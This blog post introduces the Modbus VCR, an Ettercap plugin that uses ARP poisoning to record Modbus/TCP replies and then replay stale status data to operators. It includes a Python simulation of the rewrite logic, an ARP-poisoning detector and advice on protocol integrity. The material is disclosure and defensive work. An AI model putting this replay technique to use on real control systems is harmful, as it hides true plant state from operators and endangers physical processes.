Introducing the Modbus VCR

I gave a talk two months or so ago at the Embedded Device Security Conference entitled 'Hacking Your Control System at Level 2'.  I released a silly little tool as part of the talk, one that probably hasn't gotten enough attention, even from me.  That's a shame, because the tool is kind of interesting, and it covers ground that we as security people "all know," but that we tend to forget about when we are doing security engagements for industrial customers.

The tool is the Modbus VCR.  It is a plugin for the Ettercap framework that records Modbus/TCP traffic (or really any cyclic request/response traffic) between a client and a server for a period of time and later replays the recorded responses.  The purpose of the tool is to show a really old, really dumb problem with control systems protocols: the lack of data integrity isn't just about control, it's about status, too.  An attacker who can rewrite a write command on the wire can just as easily rewrite the status the operator reads back.
The Modbus VCR gets itself between the master and the slave by ARP poisoning (courtesy of Ettercap) the master, the slave, or the router between them, and records request-response pairs as they pass.  When it sees a request go across the wire, it flags it as the start of a pair.  When it sees the response to that request, it associates the response with the request and records the pair in a list.

Once the stop condition is met (currently 10 seconds of recording), the Modbus VCR switches to overwriting response traffic.  For each new request it looks up the matching entry in the global request-response pair list and keeps a pointer to the recorded response.  When the real response to that request arrives from the slave, it overwrites the data portion of the new response with the data from the previously recorded response.  The master therefore receives a well-formed reply, from the real slave, to the request it actually sent; only the data is stale.
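The record-then-rewrite loop described above, as a Python model added here for illustration; it is not the Modbus VCR's own code (the plugin is written in C against Ettercap's API). The frame layout follows the Modbus/TCP MBAP header. Everything else is this example's own assumption about how the plugin behaves: the class and function names, pairing an in-flight request with its response by the MBAP transaction identifier, matching recorded pairs on the request PDU rather than the transaction identifier, looping through the recorded responses during replay, and the polling scenario at the end, which is constructed.

```python
import struct

# Modbus/TCP MBAP header: transaction id, protocol id (0), length, unit id
MBAP = struct.Struct(">HHHB")


def build_frame(tid, unit, function, data, proto=0):
    """Build a Modbus/TCP ADU: MBAP header followed by the PDU (function code + data)."""
    pdu = bytes([function]) + bytes(data)
    return MBAP.pack(tid, proto, len(pdu) + 1, unit) + pdu


def parse_frame(frame):
    """Split a Modbus/TCP ADU into its fields; reject frames that are not Modbus/TCP."""
    if len(frame) < MBAP.size + 1:
        raise ValueError("frame too short")
    tid, proto, length, unit = MBAP.unpack_from(frame)
    pdu = frame[MBAP.size:MBAP.size + length - 1]
    if proto != 0 or length < 2 or len(pdu) != length - 1:
        raise ValueError("malformed Modbus/TCP frame")
    return {"tid": tid, "unit": unit, "function": pdu[0], "data": pdu[1:]}


class ModbusVCR:
    """Record request/response pairs for `record_seconds`, then rewrite the data
    of every later response with recorded data for the same request.

    Pairs are keyed on (unit id, function code, request data), not on the MBAP
    transaction id: the master bumps the transaction id on every poll, so it
    differs between recording and replay. The transaction id is only used to tie
    an in-flight request to its own response (assumption: the real plugin may
    pair them differently)."""

    def __init__(self, record_seconds=10.0):
        self.record_seconds = record_seconds
        self.started = None    # time of the first request seen
        self.replaying = False
        self.pending = {}      # tid -> request key, requests awaiting a response
        self.library = {}      # request key -> list of recorded response data
        self.cursor = {}       # request key -> index of the next response to replay

    @staticmethod
    def _key(req):
        return (req["unit"], req["function"], bytes(req["data"]))

    def on_request(self, frame, now):
        """Called for each master->slave frame. Requests are forwarded unmodified."""
        req = parse_frame(frame)
        if self.started is None:
            self.started = now
        if now - self.started >= self.record_seconds:
            self.replaying = True  # stop condition: the recording window is over
        self.pending[req["tid"]] = self._key(req)
        return frame

    def on_response(self, frame):
        """Called for each slave->master frame. Returns the frame to forward."""
        resp = parse_frame(frame)
        key = self.pending.pop(resp["tid"], None)
        if key is None:
            return frame  # no matching request was seen: pass it through
        if not self.replaying:
            self.library.setdefault(key, []).append(bytes(resp["data"]))
            return frame
        recorded = self.library.get(key)
        if not recorded:
            return frame  # this poll never occurred while recording
        i = self.cursor.get(key, 0)
        data = recorded[i % len(recorded)]  # loop through the recording
        self.cursor[key] = i + 1
        if len(data) != len(resp["data"]):
            return frame  # only same-size swaps keep the TCP segment length intact
        # Keep the live header (transaction id, unit) and function code; swap only the data.
        return build_frame(resp["tid"], resp["unit"], resp["function"], data)


def simulate_poll(cycles=15, record_seconds=10.0):
    """Constructed scenario: an HMI reads two holding registers from unit 1 once
    per second while a tank level rises by one unit per poll.
    Returns a list of (tid, level the HMI displays, true level) per poll."""
    vcr = ModbusVCR(record_seconds)
    read_request = bytes.fromhex("0000 0002")  # FC 3: start register 0, quantity 2
    seen = []
    for t in range(cycles):
        tid = t + 1
        vcr.on_request(build_frame(tid, 1, 0x03, read_request), float(t))
        true_level = 100 + t
        live = build_frame(tid, 1, 0x03, bytes([4]) + struct.pack(">HH", true_level, 0))
        shown = parse_frame(vcr.on_response(live))
        seen.append((tid, struct.unpack(">HH", shown["data"][1:])[0], true_level))
    return seen


if __name__ == "__main__":
    for tid, displayed, real in simulate_poll():
        flag = "" if displayed == real else "  <- stale"
        print(f"tid={tid:2d} HMI shows {displayed} actual {real}{flag}")
```

Running it shows the HMI tracking the level for the first ten polls and then cycling back through the recorded values while the real level keeps rising: from the operator's chair nothing looks wrong, because every reply is a valid answer to a request the HMI really sent.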

The beautiful (or scary) thing about attacking a control system with the Modbus VCR is that it fools operators about the state of their process, just like Stuxnet.  The operator is blind, but doesn't know that they are blind.  Unlike Stuxnet, it is universal: it requires no knowledge of the process being controlled.  It just does its thing, recording and replaying traffic, without any concern for what the values even mean.

The Modbus VCR concept applies just as easily to other control systems protocols: DNP3 (at least the variants that do not implement Secure Authentication), ICCP (deployments that do not use SSL/TLS), IEC 61850, IEC 60870-5, and almost every vendor's proprietary protocol are vulnerable to this style of attack, and for the same reason: nothing in the protocol lets the master check that a response is fresh and unmodified.

Unfortunately, field firewalls don't help here -- I came up with this tool precisely because I was assessing a very good field device firewall.  A firewall that inspects Modbus sees a syntactically valid response, from the slave's address, to a request the master really sent; only the data changed, and the firewall has no way of knowing what the data should be.  ARP poison detection on every segment of the control system network is required to detect this attack, and even that only catches the way this particular tool gets itself into the path: an attacker with a foothold on a switch, router, or other in-line device can do the same replay without sending a single ARP packet.  To truly prevent the attack, we need to consider secure-by-design protocols that provide real data integrity and replay protection.  Even adding an SSL wrapper (with sufficient key management) to a protocol like Modbus would be enough to prevent this entire class of attack, since a response rewritten in flight would fail the record-layer integrity check.
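The ARP poison detection called for above, as a small Python detector added here; it is not part of the original post, of Ettercap, or of any product. It consumes the sender fields of ARP replies (opcode 2, gratuitous ones included) and compares them against a static IP-to-MAC baseline of the segment, which a control network is usually static enough to maintain. The addresses in the baseline and the sample replies are constructed for the example, and the alert names are this example's own.

```python
from collections import defaultdict

# Constructed baseline: the segment's known IP -> MAC inventory (assumed addresses).
BASELINE = {
    "192.168.10.10": "00:11:22:aa:aa:aa",   # HMI, the Modbus master
    "192.168.10.20": "00:11:22:bb:bb:bb",   # PLC, the Modbus slave
}


def detect_arp_poison(replies, baseline=BASELINE):
    """Scan ARP replies for poisoning against a baseline inventory.

    `replies` is an iterable of (timestamp, sender_ip, sender_mac) taken from
    ARP replies seen on the segment. Returns a list of alert tuples. Two
    signals are checked:
      1. an IP is claimed by a MAC other than the baseline / last seen one, or
         an IP that is not in the inventory appears at all;
      2. one MAC ends up claiming more than one IP, which is what a
         man-in-the-middle between master and slave looks like.
    Alerts fire once per change, not once per repeated reply, so the attacker's
    periodic re-poisoning does not flood the log."""
    learned = dict(baseline)
    ips_per_mac = defaultdict(set)
    for ip, mac in baseline.items():
        ips_per_mac[mac].add(ip)

    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = learned.get(ip)
        if previous is None:
            alerts.append((ts, "new-host", ip, None, mac))
            learned[ip] = mac
        elif previous != mac:
            alerts.append((ts, "ip-mac-change", ip, previous, mac))
            learned[ip] = mac
        before = len(ips_per_mac[mac])
        ips_per_mac[mac].add(ip)
        if len(ips_per_mac[mac]) > max(before, 1):
            alerts.append((ts, "mac-claims-multiple-ips", mac, tuple(sorted(ips_per_mac[mac]))))
    return alerts


# Constructed ARP replies, as a monitor on the segment would see them.
SAMPLE_REPLIES = [
    (0.0, "192.168.10.20", "00:11:22:bb:bb:bb"),   # PLC answers normally
    (5.0, "192.168.10.20", "00:11:22:cc:cc:cc"),   # attacker tells the HMI it is the PLC
    (5.1, "192.168.10.10", "00:11:22:cc:cc:cc"),   # attacker tells the PLC it is the HMI
    (6.0, "192.168.10.20", "00:11:22:cc:cc:cc"),   # periodic re-poison, already known
    (7.0, "192.168.10.10", "00:11:22:CC:CC:CC"),   # same, different letter case
]


if __name__ == "__main__":
    for alert in detect_arp_poison(SAMPLE_REPLIES):
        print(alert)
```

On a real segment the tuples would come from a sniffer on a span port or a tap on each segment (any capture library that hands you the ARP sender fields will do), and the baseline from the asset inventory. The second check is the more useful one for this tool: poisoning only the master is enough to rewrite responses on their way to it, so a single "ip-mac-change" on the slave's address already deserves attention.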

About this Entry

This page contains a single entry by giminy published on October 18, 2013 5:30 PM.
